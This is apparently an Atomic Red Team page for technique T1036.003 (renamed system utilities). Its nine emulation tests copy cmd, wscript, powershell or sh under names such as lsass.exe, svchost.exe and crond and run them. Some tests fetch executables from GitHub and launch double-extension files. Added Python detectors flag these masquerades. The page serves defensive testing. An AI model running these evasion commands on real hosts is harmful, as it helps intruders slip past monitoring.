Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing. (Citation: LOLBAS Main Site) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename rundll32.exe). (Citation: Elastic Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)
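The detection that follows from the description above: renaming a PE on disk does not change the `OriginalFileName` stored in its version resource, and the genuine system processes live in a small set of directories, so process-creation telemetry that carries both fields can flag the renamed copies the tests on this page create. This is an added Python example, not code from the Atomic Red Team project. The field names are modelled on Sysmon Event ID 1, the records in `SAMPLE_EVENTS` are constructed rather than captured, and `TRUSTED_DIRS` and `PROTECTED_NAMES` are assumptions for a default Windows install that you would extend for your own estate.

```python
"""Flag renamed system utilities in process-creation telemetry.

Added example (not part of the Atomic Red Team project). Two checks:
  1. the name compiled into the PE (OriginalFileName) differs from the
     file name the process was launched under;
  2. a protected system process name is running from outside the
     directories it is installed in.
"""
from __future__ import annotations

import ntpath
from dataclasses import dataclass

# Assumption: where the genuine utilities live on a default Windows install.
TRUSTED_DIRS = (
    r"c:\windows\system32",
    r"c:\windows\syswow64",
    r"c:\windows\system32\windowspowershell\v1.0",
)

# Assumption: system process names that should only ever run from System32.
PROTECTED_NAMES = {"lsass.exe", "svchost.exe", "taskhostw.exe", "lsm.exe"}

# Values Sysmon emits when the version resource is absent or unreadable.
MISSING = {"", "-", "?"}


@dataclass
class Finding:
    pid: int
    image: str
    reason: str


def check_record(rec: dict) -> list[Finding]:
    """Return the findings for one process-creation record (empty if clean)."""
    image = rec["Image"]
    name = ntpath.basename(image).lower()
    directory = ntpath.dirname(image).lower().rstrip("\\")
    original = (rec.get("OriginalFileName") or "").lower()
    findings = []
    # 1. On-disk name differs from the name compiled into the PE.
    if original not in MISSING and original != name:
        findings.append(Finding(rec["ProcessId"], image,
                                f"OriginalFileName {original} != image name {name}"))
    # 2. A protected process name launched from an untrusted directory.
    if name in PROTECTED_NAMES and directory not in TRUSTED_DIRS:
        findings.append(Finding(rec["ProcessId"], image,
                                f"{name} running from untrusted directory {directory}"))
    return findings


def scan(records) -> list[Finding]:
    """Apply check_record to every record and collect the findings."""
    out = []
    for rec in records:
        out.extend(check_record(rec))
    return out


# Constructed records, not real logs: one per masquerade on this page plus two benign ones.
SAMPLE_EVENTS = [
    {"ProcessId": 4321, "Image": r"C:\Windows\Temp\lsass.exe", "OriginalFileName": "Cmd.Exe"},
    {"ProcessId": 4322, "Image": r"C:\Users\bob\AppData\Roaming\svchost.exe", "OriginalFileName": "wscript.exe"},
    {"ProcessId": 4323, "Image": r"C:\Windows\System32\svchost.exe", "OriginalFileName": "svchost.exe"},
    {"ProcessId": 4324, "Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe"},
    # A binary with no version resource: only the path check can catch it.
    {"ProcessId": 4325, "Image": r"C:\Users\bob\AppData\Local\Temp\svchost.exe", "OriginalFileName": "-"},
]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f.pid, f.image, "->", f.reason)
```

The two checks are deliberately independent: the `OriginalFileName` comparison catches a renamed Microsoft binary wherever it runs, and the path check catches an arbitrary binary (one with no version resource at all) that merely borrows a system process name, which is the case Atomic Test #6 exercises.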
- Atomic Test #2 - Masquerading as FreeBSD or Linux crond process.
- Atomic Test #3 - Masquerading - cscript.exe running as notepad.exe
- Atomic Test #4 - Masquerading - wscript.exe running as svchost.exe
- Atomic Test #5 - Masquerading - powershell.exe running as taskhostw.exe
- Atomic Test #6 - Masquerading - non-windows exe running as windows exe
- Atomic Test #7 - Masquerading - windows exe running as different windows exe
## Atomic Test #1

Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsass.exe.

Upon execution, cmd will be launched by powershell. If using Invoke-AtomicTest, the test will hang until the 120 second timeout cancels the session.

**Supported Platforms:** Windows

**auto_generated_guid:** 5ba5a3d1-cf3c-4499-968a-a93155d1f717

#### Attack Commands: Run with `command_prompt`!

```cmd
copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe
%SystemRoot%\Temp\lsass.exe /B
```

#### Cleanup Commands:

```cmd
del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1
```
## Atomic Test #2 - Masquerading as FreeBSD or Linux crond process.

Copies the sh binary, renames it as crond, and executes it to masquerade as the cron daemon.

Upon successful execution, sh is renamed to `crond` and executed.

**Supported Platforms:** Linux

**auto_generated_guid:** a315bfff-7a98-403b-b442-2ea1b255e556

#### Attack Commands: Run with `sh`!

```sh
cp /bin/sh /tmp/crond;
echo 'sleep 5' | /tmp/crond
```

#### Cleanup Commands:

```sh
rm /tmp/crond
```
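On Linux there is no version resource to compare against, so the crond test above has to be caught from process metadata instead: `/proc/<pid>/comm` gives the name the process runs under and `/proc/<pid>/exe` the executable it was started from, and a daemon name attached to a binary under `/tmp` is the mismatch to look for. The following Python is an added example, not part of the Atomic Red Team project. `EXPECTED_DAEMONS` and `WRITABLE_DIRS` are assumptions for a typical distribution, and `build_sample_proc` constructs a stand-in for `/proc` so the scan can be exercised offline; point `scan_proc` at the real `/proc` to use it on a host.

```python
"""Spot a renamed shell posing as a daemon by walking a /proc tree.

Added example, not part of the Atomic Red Team project. For every numeric
entry under the proc root the check reads comm and exe and asks:
  - is a known daemon name running from somewhere other than its installed path?
  - does the executable live in a world-writable directory?
  - was the executable unlinked after launch (the test's cleanup step)?
"""
import os
import tempfile
from pathlib import Path

EXPECTED_DAEMONS = {  # assumption: installed paths on a typical distribution
    "crond": {"/usr/sbin/crond", "/usr/sbin/cron"},
    "sshd": {"/usr/sbin/sshd"},
}
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")
DELETED = " (deleted)"  # suffix the kernel appends to exe once the file is unlinked


def inspect_process(pid_dir: Path) -> list:
    """Return the reasons this process looks like a renamed utility (empty if none)."""
    try:
        comm = (pid_dir / "comm").read_text().strip()
        exe = os.readlink(pid_dir / "exe")
    except OSError:
        return []  # kernel thread, process already gone, or not readable by us
    reasons = []
    exe_path = exe[:-len(DELETED)] if exe.endswith(DELETED) else exe
    expected = EXPECTED_DAEMONS.get(comm)
    if expected and exe_path not in expected:
        reasons.append(f"{comm} expected at {sorted(expected)} but running from {exe_path}")
    if exe_path.startswith(WRITABLE_DIRS):
        reasons.append(f"executable in world-writable location: {exe_path}")
    if exe.endswith(DELETED):
        reasons.append("executable unlinked after launch")
    return reasons


def scan_proc(proc_root="/proc") -> dict:
    """Map pid -> reasons for every suspicious process under proc_root."""
    findings = {}
    for entry in Path(proc_root).iterdir():
        if entry.name.isdigit():
            reasons = inspect_process(entry)
            if reasons:
                findings[int(entry.name)] = reasons
    return findings


def build_sample_proc(root: Path) -> None:
    """Constructed stand-in for /proc: three processes, only the first is benign."""
    samples = {
        "1001": ("crond", "/usr/sbin/crond"),       # genuine cron daemon
        "4242": ("crond", "/tmp/crond"),            # the renamed copy of sh from the test above
        "4243": ("crond", "/tmp/crond (deleted)"),  # same copy after rm /tmp/crond ran
    }
    for pid, (comm, exe) in samples.items():
        (root / pid).mkdir()
        (root / pid / "comm").write_text(comm + "\n")
        os.symlink(exe, root / pid / "exe")  # target need not exist; only the link text is read


def demo_findings() -> dict:
    """Build the constructed tree in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_sample_proc(root)
        return scan_proc(root)


if __name__ == "__main__":
    for pid, reasons in sorted(demo_findings().items()):
        print(pid, reasons)
```

Note that comparing `comm` with the basename of `exe` would miss this test entirely, since the copy really is called `crond`; the signal is the installed-path table and the writable directory, which is why the check keys on the daemon name rather than on a name mismatch.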
## Atomic Test #3 - Masquerading - cscript.exe running as notepad.exe

Copies cscript.exe, renames it, and launches it to masquerade as an instance of notepad.exe.

Upon successful execution, cscript.exe is renamed as notepad.exe and executed from a non-standard path.

**Supported Platforms:** Windows

**auto_generated_guid:** 3a2a578b-0a01-46e4-92e3-62e2859b42f0

#### Attack Commands: Run with `command_prompt`!

```cmd
copy %SystemRoot%\System32\cscript.exe %APPDATA%\notepad.exe /Y
cmd.exe /c %APPDATA%\notepad.exe /B
```

#### Cleanup Commands:

```cmd
del /Q /F %APPDATA%\notepad.exe >nul 2>&1
```
## Atomic Test #4 - Masquerading - wscript.exe running as svchost.exe

Copies wscript.exe, renames it, and launches it to masquerade as an instance of svchost.exe.

Upon execution, no windows will remain open, but wscript will have been renamed to svchost and run from the temp folder.

**Supported Platforms:** Windows

**auto_generated_guid:** 24136435-c91a-4ede-9da1-8b284a1c1a23

#### Attack Commands: Run with `command_prompt`!

```cmd
copy %SystemRoot%\System32\wscript.exe %APPDATA%\svchost.exe /Y
cmd.exe /c %APPDATA%\svchost.exe "PathToAtomicsFolder\..\ExternalPayloads\T1036.003\src\T1036.003_masquerading.vbs"
```

#### Cleanup Commands:

```cmd
del /Q /F %APPDATA%\svchost.exe >nul 2>&1
```

#### Dependencies: Run with `powershell`!

##### Check Prereq Commands:

```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\T1036.003\src\T1036.003_masquerading.vbs") {exit 0} else {exit 1}
```

##### Get Prereq Commands:

```powershell
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\T1036.003\src\T1036.003_masquerading.vbs") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/src/T1036.003_masquerading.vbs" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\T1036.003\src\T1036.003_masquerading.vbs"
```
## Atomic Test #5 - Masquerading - powershell.exe running as taskhostw.exe

Copies powershell.exe, renames it, and launches it to masquerade as an instance of taskhostw.exe.

Upon successful execution, powershell.exe is renamed as taskhostw.exe and executed from a non-standard path.

**Supported Platforms:** Windows

**auto_generated_guid:** ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa

#### Attack Commands: Run with `command_prompt`!

```cmd
copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\taskhostw.exe /Y
cmd.exe /K %APPDATA%\taskhostw.exe
```

#### Cleanup Commands:

```cmd
del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1
```
## Atomic Test #6 - Masquerading - non-windows exe running as windows exe

Copies an exe, renames it as a Windows exe, and launches it to masquerade as a real Windows exe.

Upon successful execution, powershell will execute T1036.003.exe as svchost.exe from a non-standard path.

**Supported Platforms:** Windows

**auto_generated_guid:** bc15c13f-d121-4b1f-8c7d-28d95854d086

#### Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| outputfile | path of file to execute | path | ($env:TEMP + "\svchost.exe") |
| inputfile | path of file to copy | path | PathToAtomicsFolder\T1036.003\bin\T1036.003.exe |

#### Attack Commands: Run with `powershell`!

```powershell
copy "#{inputfile}" #{outputfile}
try { $myT1036_003 = (Start-Process -PassThru -FilePath #{outputfile}).Id }
catch { $_; exit $_.Exception.HResult}
Stop-Process -ID $myT1036_003
```

#### Cleanup Commands:

```powershell
Remove-Item #{outputfile} -Force -ErrorAction Ignore
```

#### Dependencies: Run with `powershell`!

##### Check Prereq Commands:

```powershell
if (Test-Path "#{inputfile}") {exit 0} else {exit 1}
```

##### Get Prereq Commands:

```powershell
New-Item -Type Directory (split-path "#{inputfile}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/bin/T1036.003.exe" -OutFile "#{inputfile}"
```
## Atomic Test #7 - Masquerading - windows exe running as different windows exe

Copies a Windows exe, renames it as another Windows exe, and launches it to masquerade as the second Windows exe.

**Supported Platforms:** Windows

**auto_generated_guid:** c3d24a39-2bfe-4c6a-b064-90cd73896cb0

#### Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| outputfile | path of file to execute | path | ($env:TEMP + "\svchost.exe") |
| inputfile | path of file to copy | path | $env:ComSpec |

#### Attack Commands: Run with `powershell`!

```powershell
copy "#{inputfile}" #{outputfile}
$myT1036_003 = (Start-Process -PassThru -FilePath #{outputfile}).Id
Stop-Process -ID $myT1036_003
```

#### Cleanup Commands:

```powershell
Remove-Item #{outputfile} -Force -ErrorAction Ignore
```
## Atomic Test #8

Detect LSM running from an incorrect directory and an incorrect service account. This works by copying cmd.exe to a file, naming it lsm.exe, then writing a marker file to the C:\ folder.

Upon successful execution, cmd.exe will be renamed as lsm.exe and executed from a non-standard path.

**Supported Platforms:** Windows

**auto_generated_guid:** 83810c46-f45e-4485-9ab6-8ed0e9e6ed7f

#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

```cmd
copy C:\Windows\System32\cmd.exe C:\lsm.exe
C:\lsm.exe /c echo T1036.003 > C:\T1036.003.txt
```

#### Cleanup Commands:

```cmd
del C:\T1036.003.txt >nul 2>&1
del C:\lsm.exe >nul 2>&1
```
## Atomic Test #9

Download and execute a file masquerading as images or Office files. Upon execution 3 calc instances and 3 vbs windows will be launched.

e.g. SOME_LEGIT_NAME.[doc,docx,xls,xlsx,pdf,rtf,png,jpg,etc.].[exe,vbs,js,ps1,etc] (Quarterlyreport.docx.exe)

**Supported Platforms:** Windows

**auto_generated_guid:** c7fa0c3b-b57f-4cba-9118-863bf4e653fc

#### Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| exe_path | path to exe to use when creating masquerading files | path | C:\Windows\System32\calc.exe |
| vbs_path | path of vbs to use when creating masquerading files | path | PathToAtomicsFolder\T1036.003\src\T1036.003_masquerading.vbs |
| ps1_path | path of powershell script to use when creating masquerading files | path | PathToAtomicsFolder\T1036.003\src\T1036.003_masquerading.ps1 |

#### Attack Commands: Run with `command_prompt`!

```cmd
copy "#{exe_path}" %temp%\T1036.003_masquerading.docx.exe /Y
copy "#{exe_path}" %temp%\T1036.003_masquerading.pdf.exe /Y
copy "#{exe_path}" %temp%\T1036.003_masquerading.ps1.exe /Y
copy "#{vbs_path}" %temp%\T1036.003_masquerading.xls.vbs /Y
copy "#{vbs_path}" %temp%\T1036.003_masquerading.xlsx.vbs /Y
copy "#{vbs_path}" %temp%\T1036.003_masquerading.png.vbs /Y
copy "#{ps1_path}" %temp%\T1036.003_masquerading.doc.ps1 /Y
copy "#{ps1_path}" %temp%\T1036.003_masquerading.pdf.ps1 /Y
copy "#{ps1_path}" %temp%\T1036.003_masquerading.rtf.ps1 /Y
%temp%\T1036.003_masquerading.docx.exe
%temp%\T1036.003_masquerading.pdf.exe
%temp%\T1036.003_masquerading.ps1.exe
%temp%\T1036.003_masquerading.xls.vbs
%temp%\T1036.003_masquerading.xlsx.vbs
%temp%\T1036.003_masquerading.png.vbs
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %temp%\T1036.003_masquerading.doc.ps1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %temp%\T1036.003_masquerading.pdf.ps1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %temp%\T1036.003_masquerading.rtf.ps1
```

#### Cleanup Commands:

```cmd
del /f %temp%\T1036.003_masquerading.docx.exe > nul 2>&1
del /f %temp%\T1036.003_masquerading.pdf.exe > nul 2>&1
del /f %temp%\T1036.003_masquerading.ps1.exe > nul 2>&1
del /f %temp%\T1036.003_masquerading.xls.vbs > nul 2>&1
del /f %temp%\T1036.003_masquerading.xlsx.vbs > nul 2>&1
del /f %temp%\T1036.003_masquerading.png.vbs > nul 2>&1
del /f %temp%\T1036.003_masquerading.doc.ps1 > nul 2>&1
del /f %temp%\T1036.003_masquerading.pdf.ps1 > nul 2>&1
del /f %temp%\T1036.003_masquerading.rtf.ps1 > nul 2>&1
```

#### Dependencies: Run with `powershell`!

##### Check Prereq Commands:

```powershell
if (Test-Path "#{vbs_path}") {exit 0} else {exit 1}
```

##### Get Prereq Commands:

```powershell
New-Item -Type Directory (split-path "#{vbs_path}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/src/T1036.003_masquerading.vbs" -OutFile "#{vbs_path}"
```

##### Check Prereq Commands:

```powershell
if (Test-Path "#{ps1_path}") {exit 0} else {exit 1}
```

##### Get Prereq Commands:

```powershell
New-Item -Type Directory (split-path "#{ps1_path}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/src/T1036.003_masquerading.ps1" -OutFile "#{ps1_path}"
```
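The files the test above drops all share one shape: a document or image extension immediately before an executable one, so a checker only needs the last two extensions of a name to flag every one of them while leaving `report.docx` or `archive.tar.gz` alone. The Python below is an added example, not part of the Atomic Red Team project. `DECOY_EXTS` and `EXEC_EXTS` are assumptions seeded from the test's own "e.g." line, `SAMPLE_NAMES` is a constructed listing, and `scan_directory` is the same check applied to a real folder.

```python
"""Flag file names wearing a document or image extension in front of an
executable one (NAME.docx.exe, NAME.xls.vbs, NAME.pdf.ps1 and so on).

Added example, not part of the Atomic Red Team project. The check strips any
path, ignores case, and examines only the last two extensions, so names with
extra dots in the stem (T1036.003_masquerading.xls.vbs) are handled and
multi-part archive names (archive.tar.gz) stay quiet.
"""
import os

# Assumptions drawn from the test's e.g. line; extend for your environment.
DECOY_EXTS = {"doc", "docx", "xls", "xlsx", "pdf", "rtf", "png", "jpg", "jpeg", "gif", "txt"}
EXEC_EXTS = {"exe", "vbs", "js", "ps1", "bat", "cmd", "scr", "hta", "wsf"}


def classify(filename: str) -> list:
    """Return the reasons a file name looks disguised (empty list when it does not)."""
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]  # drop any directory part
    parts = name.lower().split(".")
    if len(parts) < 3:
        return []  # a single extension cannot be a double-extension disguise
    real, shown = parts[-1], parts[-2]
    reasons = []
    if real in EXEC_EXTS and shown in DECOY_EXTS:
        reasons.append(f"executable .{real} disguised as .{shown}")
    elif real in EXEC_EXTS and shown in EXEC_EXTS and shown != real:
        # e.g. a .ps1.exe: still an executable wearing a different executable's extension
        reasons.append(f"executable .{real} disguised as script .{shown}")
    return reasons


def scan_names(names) -> dict:
    """Map each flagged name to its reasons; unflagged names are omitted."""
    flagged = {}
    for name in names:
        reasons = classify(name)
        if reasons:
            flagged[name] = reasons
    return flagged


def scan_directory(path: str) -> dict:
    """Apply the check to every regular file directly inside path."""
    return scan_names(entry.name for entry in os.scandir(path) if entry.is_file())


# Constructed listing of a temp folder after the test ran, plus benign names.
SAMPLE_NAMES = [
    "Quarterlyreport.docx.exe",
    r"C:\Users\bob\AppData\Local\Temp\T1036.003_masquerading.xls.vbs",
    "T1036.003_masquerading.ps1.exe",
    "T1036.003_masquerading.pdf.ps1",
    "report.docx",
    "archive.tar.gz",
    "calc.exe",
]


if __name__ == "__main__":
    for name, reasons in scan_names(SAMPLE_NAMES).items():
        print(name, "->", reasons)
```

Because the test copies the payloads into `%temp%`, pointing `scan_directory` at the user's temp folder after the test has run shows the nine dropped names before the cleanup step removes them; the same call over a mail attachment quarantine or download folder is the practical use.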